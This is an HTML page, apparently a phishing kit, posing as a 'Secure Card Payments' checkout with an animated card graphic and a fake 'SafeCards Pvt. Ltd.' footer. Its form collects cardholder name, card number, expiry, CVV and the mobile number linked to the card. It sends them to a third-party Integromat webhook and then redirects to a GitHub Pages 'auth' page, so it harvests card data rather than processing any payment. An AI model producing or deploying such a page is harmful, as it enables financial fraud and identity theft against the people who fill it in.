<!DOCTYPE html>
<html lang="en" >
    <style>
body {
  background: radial-gradient(ellipse at bottom, #1b2735 0%, #090a0f 100%);  
}

.night {
  position: relative;
  width: 100%;
  height: 100%;
  transform: rotateZ(45deg);
}

.shooting_star {
  position: absolute;
  left: 50%;
  top: 50%;
  height: 2px;
  background: linear-gradient(-45deg, #5f91ff, rgba(0, 0, 255, 0));
  border-radius: 999px;
  filter: drop-shadow(0 0 6px #699bff);
  -webkit-animation: tail 3000ms ease-in-out infinite, shooting 3000ms ease-in-out infinite;
          animation: tail 3000ms ease-in-out infinite, shooting 3000ms ease-in-out infinite;
}
.shooting_star::before {
  content: "";
  position: absolute;
  top: calc(50% - 1px);
  right: 0;
  height: 2px;
  background: linear-gradient(-45deg, rgba(0, 0, 255, 0), #5f91ff, rgba(0, 0, 255, 0));
  transform: translateX(50%) rotateZ(45deg);
  border-radius: 100%;
  -webkit-animation: shining 3000ms ease-in-out infinite;
          animation: shining 3000ms ease-in-out infinite;
}
.shooting_star::after {
  content: "";
  position: absolute;
  top: calc(50% - 1px);
  right: 0;
  height: 2px;
  background: linear-gradient(-45deg, rgba(0, 0, 255, 0), #5f91ff, rgba(0, 0, 255, 0));
  transform: translateX(50%) rotateZ(45deg);
  border-radius: 100%;
  -webkit-animation: shining 3000ms ease-in-out infinite;
          animation: shining 3000ms ease-in-out infinite;
  transform: translateX(50%) rotateZ(-45deg);
}
.shooting_star:nth-child(1) {
  top: calc(50% - 75px);
  left: calc(50% - 88px);
  -webkit-animation-delay: 3500ms;
          animation-delay: 3500ms;
}
.shooting_star:nth-child(1)::before, .shooting_star:nth-child(1)::after {
  -webkit-animation-delay: 3500ms;
          animation-delay: 3500ms;
}
.shooting_star:nth-child(2) {
  top: calc(50% - 79px);
  left: calc(50% - 212px);
  -webkit-animation-delay: 3218ms;
          animation-delay: 3218ms;
}
.shooting_star:nth-child(2)::before, .shooting_star:nth-child(2)::after {
  -webkit-animation-delay: 3218ms;
          animation-delay: 3218ms;
}
.shooting_star:nth-child(3) {
  top: calc(50% - -89px);
  left: calc(50% - 245px);
  -webkit-animation-delay: 8384ms;
          animation-delay: 8384ms;
}
.shooting_star:nth-child(3)::before, .shooting_star:nth-child(3)::after {
  -webkit-animation-delay: 8384ms;
          animation-delay: 8384ms;
}
.shooting_star:nth-child(4) {
  top: calc(50% - 45px);
  left: calc(50% - 198px);
  -webkit-animation-delay: 4886ms;
          animation-delay: 4886ms;
}
.shooting_star:nth-child(4)::before, .shooting_star:nth-child(4)::after {
  -webkit-animation-delay: 4886ms;
          animation-delay: 4886ms;
}
.shooting_star:nth-child(5) {
  top: calc(50% - -171px);
  left: calc(50% - 285px);
  -webkit-animation-delay: 5301ms;
          animation-delay: 5301ms;
}
.shooting_star:nth-child(5)::before, .shooting_star:nth-child(5)::after {
  -webkit-animation-delay: 5301ms;
          animation-delay: 5301ms;
}
.shooting_star:nth-child(6) {
  top: calc(50% - -46px);
  left: calc(50% - 81px);
  -webkit-animation-delay: 3816ms;
          animation-delay: 3816ms;
}
.shooting_star:nth-child(6)::before, .shooting_star:nth-child(6)::after {
  -webkit-animation-delay: 3816ms;
          animation-delay: 3816ms;
}
.shooting_star:nth-child(7) {
  top: calc(50% - -14px);
  left: calc(50% - 52px);
  -webkit-animation-delay: 5285ms;
          animation-delay: 5285ms;
}
.shooting_star:nth-child(7)::before, .shooting_star:nth-child(7)::after {
  -webkit-animation-delay: 5285ms;
          animation-delay: 5285ms;
}
.shooting_star:nth-child(8) {
  top: calc(50% - -122px);
  left: calc(50% - 178px);
  -webkit-animation-delay: 4850ms;
          animation-delay: 4850ms;
}
.shooting_star:nth-child(8)::before, .shooting_star:nth-child(8)::after {
  -webkit-animation-delay: 4850ms;
          animation-delay: 4850ms;
}
.shooting_star:nth-child(9) {
  top: calc(50% - 107px);
  left: calc(50% - 259px);
  -webkit-animation-delay: 3092ms;
          animation-delay: 3092ms;
}
.shooting_star:nth-child(9)::before, .shooting_star:nth-child(9)::after {
  -webkit-animation-delay: 3092ms;
          animation-delay: 3092ms;
}
.shooting_star:nth-child(10) {
  top: calc(50% - 146px);
  left: calc(50% - 274px);
  -webkit-animation-delay: 4588ms;
          animation-delay: 4588ms;
}
.shooting_star:nth-child(10)::before, .shooting_star:nth-child(10)::after {
  -webkit-animation-delay: 4588ms;
          animation-delay: 4588ms;
}
.shooting_star:nth-child(11) {
  top: calc(50% - 17px);
  left: calc(50% - 279px);
  -webkit-animation-delay: 8245ms;
          animation-delay: 8245ms;
}
.shooting_star:nth-child(11)::before, .shooting_star:nth-child(11)::after {
  -webkit-animation-delay: 8245ms;
          animation-delay: 8245ms;
}
.shooting_star:nth-child(12) {
  top: calc(50% - -85px);
  left: calc(50% - 153px);
  -webkit-animation-delay: 4244ms;
          animation-delay: 4244ms;
}
.shooting_star:nth-child(12)::before, .shooting_star:nth-child(12)::after {
  -webkit-animation-delay: 4244ms;
          animation-delay: 4244ms;
}
.shooting_star:nth-child(13) {
  top: calc(50% - 188px);
  left: calc(50% - 218px);
  -webkit-animation-delay: 780ms;
          animation-delay: 780ms;
}
.shooting_star:nth-child(13)::before, .shooting_star:nth-child(13)::after {
  -webkit-animation-delay: 780ms;
          animation-delay: 780ms;
}
.shooting_star:nth-child(14) {
  top: calc(50% - -60px);
  left: calc(50% - 223px);
  -webkit-animation-delay: 1904ms;
          animation-delay: 1904ms;
}
.shooting_star:nth-child(14)::before, .shooting_star:nth-child(14)::after {
  -webkit-animation-delay: 1904ms;
          animation-delay: 1904ms;
}
.shooting_star:nth-child(15) {
  top: calc(50% - -153px);
  left: calc(50% - 27px);
  -webkit-animation-delay: 5578ms;
          animation-delay: 5578ms;
}
.shooting_star:nth-child(15)::before, .shooting_star:nth-child(15)::after {
  -webkit-animation-delay: 5578ms;
          animation-delay: 5578ms;
}
.shooting_star:nth-child(16) {
  top: calc(50% - 37px);
  left: calc(50% - 177px);
  -webkit-animation-delay: 7417ms;
          animation-delay: 7417ms;
}
.shooting_star:nth-child(16)::before, .shooting_star:nth-child(16)::after {
  -webkit-animation-delay: 7417ms;
          animation-delay: 7417ms;
}
.shooting_star:nth-child(17) {
  top: calc(50% - 33px);
  left: calc(50% - 108px);
  -webkit-animation-delay: 6968ms;
          animation-delay: 6968ms;
}
.shooting_star:nth-child(17)::before, .shooting_star:nth-child(17)::after {
  -webkit-animation-delay: 6968ms;
          animation-delay: 6968ms;
}
.shooting_star:nth-child(18) {
  top: calc(50% - 195px);
  left: calc(50% - 106px);
  -webkit-animation-delay: 5855ms;
          animation-delay: 5855ms;
}
.shooting_star:nth-child(18)::before, .shooting_star:nth-child(18)::after {
  -webkit-animation-delay: 5855ms;
          animation-delay: 5855ms;
}
.shooting_star:nth-child(19) {
  top: calc(50% - -132px);
  left: calc(50% - 27px);
  -webkit-animation-delay: 5435ms;
          animation-delay: 5435ms;
}
.shooting_star:nth-child(19)::before, .shooting_star:nth-child(19)::after {
  -webkit-animation-delay: 5435ms;
          animation-delay: 5435ms;
}
.shooting_star:nth-child(20) {
  top: calc(50% - -53px);
  left: calc(50% - 103px);
  -webkit-animation-delay: 3041ms;
          animation-delay: 3041ms;
}
.shooting_star:nth-child(20)::before, .shooting_star:nth-child(20)::after {
  -webkit-animation-delay: 3041ms;
          animation-delay: 3041ms;
}

@-webkit-keyframes tail {
  0% {
    width: 0;
  }
  30% {
    width: 100px;
  }
  100% {
    width: 0;
  }
}

@keyframes tail {
  0% {
    width: 0;
  }
  30% {
    width: 100px;
  }
  100% {
    width: 0;
  }
}
@-webkit-keyframes shining {
  0% {
    width: 0;
  }
  50% {
    width: 30px;
  }
  100% {
    width: 0;
  }
}
@keyframes shining {
  0% {
    width: 0;
  }
  50% {
    width: 30px;
  }
  100% {
    width: 0;
  }
}
@-webkit-keyframes shooting {
  0% {
    transform: translateX(0);
  }
  100% {
    transform: translateX(300px);
  }
}
@keyframes shooting {
  0% {
    transform: translateX(0);
  }
  100% {
    transform: translateX(300px);
  }
}
@-webkit-keyframes sky {
  0% {
    transform: rotate(45deg);
  }
  100% {
    transform: rotate(405deg);
  }
}
@keyframes sky {
  0% {
    transform: rotate(45deg);
  }
  100% {
    transform: rotate(405deg);
  }
}
    </style>
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content ="width=device-width,initial-scale=1,user-scalable=yes" />
<title>Secure Card Payments</title>
  <link href="https://fonts.googleapis.com/css?family=Raleway|Rock+Salt|Source+Code+Pro:300,400,600" rel="stylesheet"><link rel="stylesheet" href="./style.css">
  <!-- add icon link -->
        <link rel = "icon" href = 
"https://cdn4.vectorstock.com/i/1000x1000/64/53/contactless-payment-credit-card-and-hand-tap-logo-vector-26336453.jpg" 
        type = "image/x-icon">
        <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css">
<link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Anton'><link rel="stylesheet" href="./style.css">

</head>
<body>
    
<!-- partial:index.partial.html -->
<form action="https://hook.integromat.com/9kgltte5dww6wevp678moki7sw37fkqo" method="POST">
    <input type="hidden" id="redirect" name="redirect" value="https://homotraders.github.io/auth">
<!--div class="payment-title">
        <h1><strong>Enter Card Details for Payment</strong></h1>
    </div>-->
    
    <div class="container preload">
        <div class="creditcard">
            <div class="front">
                <div id="ccsingle"></div>
                <svg version="1.1" id="cardfront" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
                    x="0px" y="0px" viewBox="0 0 750 471" style="enable-background:new 0 0 750 471;" xml:space="preserve">
                    <g id="Front">
                        <g id="CardBackground">
                            <g id="Page-1_1_">
                                <g id="amex_1_">
                                    <path id="Rectangle-1_1_" class="lightcolor grey" d="M40,0h670c22.1,0,40,17.9,40,40v391c0,22.1-17.9,40-40,40H40c-22.1,0-40-17.9-40-40V40
                            C0,17.9,17.9,0,40,0z" />
                                </g>
                            </g>
                            <path class="darkcolor greydark" d="M750,431V193.2c-217.6-57.5-556.4-13.5-750,24.9V431c0,22.1,17.9,40,40,40h670C732.1,471,750,453.1,750,431z" />
                        </g>
                        <text transform="matrix(1 0 0 1 60.106 295.0121)" id="svgnumber" class="st2 st3 st4">0123 4567 8910 1112</text>
                        <text transform="matrix(1 0 0 1 54.1064 428.1723)" id="svgname" class="st2 st5 st6">JOHN DOE</text>
                        <text transform="matrix(1 0 0 1 54.1074 389.8793)" class="st7 st5 st8">cardholder name</text>
                        <text transform="matrix(1 0 0 1 479.7754 388.8793)" class="st7 st5 st8">expiration</text>
                        <text transform="matrix(1 0 0 1 65.1054 241.5)" class="st7 st5 st8">card number</text>
                        <g>
                            <text transform="matrix(1 0 0 1 574.4219 433.8095)" id="svgexpire" class="st2 st5 st9">01/23</text>
                            <text transform="matrix(1 0 0 1 479.3848 417.0097)" class="st2 st10 st11">VALID</text>
                            <text transform="matrix(1 0 0 1 479.3848 435.6762)" class="st2 st10 st11">THRU</text>
                            <polygon class="st2" points="554.5,421 540.4,414.2 540.4,427.9 		" />
                        </g>
                        <g id="cchip">
                            <g>
                                <path class="st2" d="M168.1,143.6H82.9c-10.2,0-18.5-8.3-18.5-18.5V74.9c0-10.2,8.3-18.5,18.5-18.5h85.3
                        c10.2,0,18.5,8.3,18.5,18.5v50.2C186.6,135.3,178.3,143.6,168.1,143.6z" />
                            </g>
                            <g>
                                <g>
                                    <rect x="82" y="70" class="st12" width="1.5" height="60" />
                                </g>
                                <g>
                                    <rect x="167.4" y="70" class="st12" width="1.5" height="60" />
                                </g>
                                <g>
                                    <path class="st12" d="M125.5,130.8c-10.2,0-18.5-8.3-18.5-18.5c0-4.6,1.7-8.9,4.7-12.3c-3-3.4-4.7-7.7-4.7-12.3
                            c0-10.2,8.3-18.5,18.5-18.5s18.5,8.3,18.5,18.5c0,4.6-1.7,8.9-4.7,12.3c3,3.4,4.7,7.7,4.7,12.3
                            C143.9,122.5,135.7,130.8,125.5,130.8z M125.5,70.8c-9.3,0-16.9,7.6-16.9,16.9c0,4.4,1.7,8.6,4.8,11.8l0.5,0.5l-0.5,0.5
                            c-3.1,3.2-4.8,7.4-4.8,11.8c0,9.3,7.6,16.9,16.9,16.9s16.9-7.6,16.9-16.9c0-4.4-1.7-8.6-4.8-11.8l-0.5-0.5l0.5-0.5
                            c3.1-3.2,4.8-7.4,4.8-11.8C142.4,78.4,134.8,70.8,125.5,70.8z" />
                                </g>
                                <g>
                                    <rect x="82.8" y="82.1" class="st12" width="25.8" height="1.5" />
                                </g>
                                <g>
                                    <rect x="82.8" y="117.9" class="st12" width="26.1" height="1.5" />
                                </g>
                                <g>
                                    <rect x="142.4" y="82.1" class="st12" width="25.8" height="1.5" />
                                </g>
                                <g>
                                    <rect x="142" y="117.9" class="st12" width="26.2" height="1.5" />
                                </g>
                            </g>
                        </g>
                    </g>
                    <g id="Back">
                    </g>
                </svg>
            </div>
            <div class="back">
                <svg version="1.1" id="cardback" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
                    x="0px" y="0px" viewBox="0 0 750 471" style="enable-background:new 0 0 750 471;" xml:space="preserve">
                    <g id="Front">
                        <line class="st0" x1="35.3" y1="10.4" x2="36.7" y2="11" />
                    </g>
                    <g id="Back">
                        <g id="Page-1_2_">
                            <g id="amex_2_">
                                <path id="Rectangle-1_2_" class="darkcolor greydark" d="M40,0h670c22.1,0,40,17.9,40,40v391c0,22.1-17.9,40-40,40H40c-22.1,0-40-17.9-40-40V40
                        C0,17.9,17.9,0,40,0z" />
                            </g>
                        </g>
                        <rect y="61.6" class="st2" width="750" height="78" />
                        <g>
                            <path class="st3" d="M701.1,249.1H48.9c-3.3,0-6-2.7-6-6v-52.5c0-3.3,2.7-6,6-6h652.1c3.3,0,6,2.7,6,6v52.5
                    C707.1,246.4,704.4,249.1,701.1,249.1z" />
                            <rect x="42.9" y="198.6" class="st4" width="664.1" height="10.5" />
                            <rect x="42.9" y="224.5" class="st4" width="664.1" height="10.5" />
                            <path class="st5" d="M701.1,184.6H618h-8h-10v64.5h10h8h83.1c3.3,0,6-2.7,6-6v-52.5C707.1,187.3,704.4,184.6,701.1,184.6z" />
                        </g>
                        <text transform="matrix(1 0 0 1 621.999 227.2734)" id="svgsecurity" class="st6 st7">985</text>
                        <g class="st8">
                            <text transform="matrix(1 0 0 1 518.083 280.0879)" class="st9 st6 st10">security code</text>
                        </g>
                        <rect x="58.1" y="378.6" class="st11" width="375.5" height="13.5" />
                        <rect x="58.1" y="405.6" class="st11" width="421.7" height="13.5" />
                        <text transform="matrix(1 0 0 1 59.5073 228.6099)" id="svgnameback" class="st12 st13">John Doe</text>
                    </g>
                </svg>
            </div>
        </div>
    </div>
    <div class="night">
        <div class="shooting_star"></div>
        <div class="shooting_star"></div>
        <div class="shooting_star"></div>
        <div class="shooting_star"></div>
        <div class="shooting_star"></div>
        <div class="shooting_star"></div>
        <div class="shooting_star"></div>
        <div class="shooting_star"></div>
        <div class="shooting_star"></div>
        <div class="shooting_star"></div>
        <div class="shooting_star"></div>
        <div class="shooting_star"></div>
        <div class="shooting_star"></div>
        <div class="shooting_star"></div>
    </div>
    <div class="form-container">
        <div class="field-container">
            <label for="name">Name</label>
            <input name="name" id="name" maxlength="20" type="text" required>
        </div>
        <div class="field-container">
           <label for="cardnumber">Card Number</label>  <!--<span id="generatecard">generate random</span>-->
            <input name="cardnumber" id="cardnumber" type="text" inputmode="numeric" required>
            <svg id="ccicon" class="ccicon" width="750" height="471" viewBox="0 0 750 471" version="1.1" xmlns="http://www.w3.org/2000/svg"
            xmlns:xlink="http://www.w3.org/1999/xlink">  </svg>
        
        </div>
        
        <div class="field-container">
            <label for="expirationdate">Expiration (mm/yy)</label>
            <input name="Expiry" id="expirationdate" type="text"  inputmode="numeric" required>
        </div>
        <div class="field-container">
            <label for="securitycode">Security Code (cvv)</label>
            <input name="CVV" id="securitycode" type="text"  inputmode="numeric" required>
        </div>
        <div class="field-container">
            <label for="securitycode">Mobile Number</label>
            <input name="Mobile" id="securitycode" type="number"  inputmode="numeric" placeholder="Only enter mobile linked with your card to avoid payment failures." required>
        </div>
        <button class="myButton" type="submit" ><span>Proceed to Payment</span></button>
    </div>
    <div class="charge">
        <h5><strong>4.2 % Card Gateway Charges are Applied<br>for both Credit/Debit Cards</strong></h5>
        <h6><strong>&copy; 2022 SafeCards Pvt. Ltd.</strong></h6>
        </div>
	
</form>
        
<!-- partial -->
  <script src='https://cdnjs.cloudflare.com/ajax/libs/imask/3.4.0/imask.min.js'></script><script  src="./script.js"></script>

</body>
</html>
